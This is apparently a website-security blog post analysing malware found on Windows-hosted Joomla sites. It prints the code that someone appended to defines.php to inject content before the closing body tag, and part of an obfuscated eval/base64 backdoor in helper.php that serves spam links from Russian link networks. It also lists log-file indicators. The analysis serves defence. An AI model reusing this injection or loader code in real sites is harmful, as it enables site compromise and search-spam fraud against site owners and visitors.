We found some interesting Joomla malware this week, where Joomla’s /includes/defines.php file had this code appended to it:

define('DZR', base64_decode('QzovaW5l[REDACTED]5waHA='));
if ( file_exists (DZR) ) { ob_start(); require_once(DZR); ob_end_clean(); } if ( !defined('RSLT') ) define('RSLT', '');
ob_start("callbck"); function callbck($buff_obs) { if ( defined('DZTR') ) return DZTR;
if ( defined('NIND') ) { $buff_obs = ereg_replace("href=\"http", "href=\"_http", $buff_obs);
$buff_obs = ereg_replace("href='http", "href='_http", $buff_obs);
$buff_obs = ereg_replace("href=http", "href=_http", $buff_obs);
$buff_obs = ereg_replace("_http://".NIND, "http://".NIND, $buff_obs);}
return (ereg_replace("</body>", RSLT."\n</body>", $buff_obs)); }

The first line defines a variable “DZR” as “C:/inetpub/wwwroot/[REDACTED]/modules/mod_banners/tmpl/helper.php”.  This was on a Windows server running multiple Joomla sites, and DZR, pointed to a file helper.php within a different site.  Several other sites on the server also had their defines.php infected with code pointing to this same helper.php.

The rest of the code basically runs helper.php and looks for a variable call “RSLT” (result) to append just before the closing “</body>” tag of pages on the infected site.  So what does helper.php do?

<?php
//Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar
$vd97cfe94a57="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($vd97cfe94a57(
"JHE1YTcyZTg3MzI0ZThhMjhlMTRkMzFhNDVjMDJjM2QwPSJceDYyIjskcjU1ZDNkOWMxZGU4ZTRkMDkxMGJlMWF
mMGZjZjU4ZjM9Ilx4NjUiOyRrODY0MzQwODBmMTAxZjhlNzg5MTAzMzI1NWM1YzM0ZD0iXHg2NiI7JHYwMTBlNGI
4Y2QxZTUyYzI3YTg4NjgxMDc4MmU3YzFkPSJceDY3IjskdTY1ZGI1YjNkMzJjMzI0Y2VmZmYwYzgwOTU3MmNjMGY
9Ilx4NmQiOyR0NjVjMWNiY[etc.]zXHgzN1w2NVx4NjNcNjFceDYzXDYwXHg2Mlw2MFx4MzFcNjFceDM1XDE0MVx4MzRcNjRceDY
0XDE0Nlx4MzJcNzAiKT8kdDY1YzFjYmE1Y2M5Y2M0YmU2OTBjNWUyZGM1OTllYzMoKTokdGEwY2E4ZDBmNGJiY2Y
0NTU4NDZhMWJkYzg1ODBjNjUoKTs="));
?>

We deobfuscated the code enough to find out.  It contains some basic backdoor code, but its main function is to check a bunch of variables and then display links obtained from one of the following Russian link-building networks:

  • linkfeed.ru
  • sape.ru
  • trustlink.ru
  • xap.ru
  • proflinks.net

 

It keeps track of what has been displayed via several log files, and it will contact external servers to obtain fresh links.  It assembles code around the links (sometimes hidden with Javascript setting the display property to “none”) and  returns it to Joomla via the RSLT variable.  It stores the log files in a temporary directory on the server, in this case “C:/tmp/tmp_server”.  The files would have these names:

  • sess_fc.log
  • sess_fs.log
  • sess_nssp.log
  • sess_nslf.log
  • sess_nstl.log
  • sess_nsxp.log
  • sess_nspl.log
  • sess_fssp.log
  • sess_fslf.log
  • sess_fstl.log
  • sess_fsxp.log
  • sess_fspl.log
  • sess_tr.log
  • sess_(l|s|t|x|p)(32 hex characters)

 

The links seem to be pretty standard spam – online pharmacies, online casinos, payday loans, etc.  Though the link networks are Russian, the spam can be in English or potentially any language.  The purpose of the links is to fraudulently build up their targets in search engine results by having a variety of sites link to them.

If you think your site is infected with this or any malicious code, you can always contact us and get help taking care of it.